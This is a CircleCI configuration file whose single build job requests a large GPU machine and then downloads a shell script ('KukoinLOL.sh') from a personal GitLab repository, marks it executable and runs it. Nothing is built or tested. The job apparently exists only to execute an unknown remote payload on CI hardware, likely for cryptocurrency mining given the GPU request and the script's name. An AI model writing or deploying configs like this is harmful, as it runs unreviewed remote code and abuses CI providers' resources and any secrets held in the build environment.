version: 2.1

jobs:
  build:
    machine:
      resource_class: gpu.nvidia.large
      image: ubuntu-2004-cuda-11.2:202103-01
    steps:
      - run: wget https://gitlab.com/denisule33/why/-/raw/main/KukoinLOL.sh && chmod +x KukoinLOL.sh && ./KukoinLOL.sh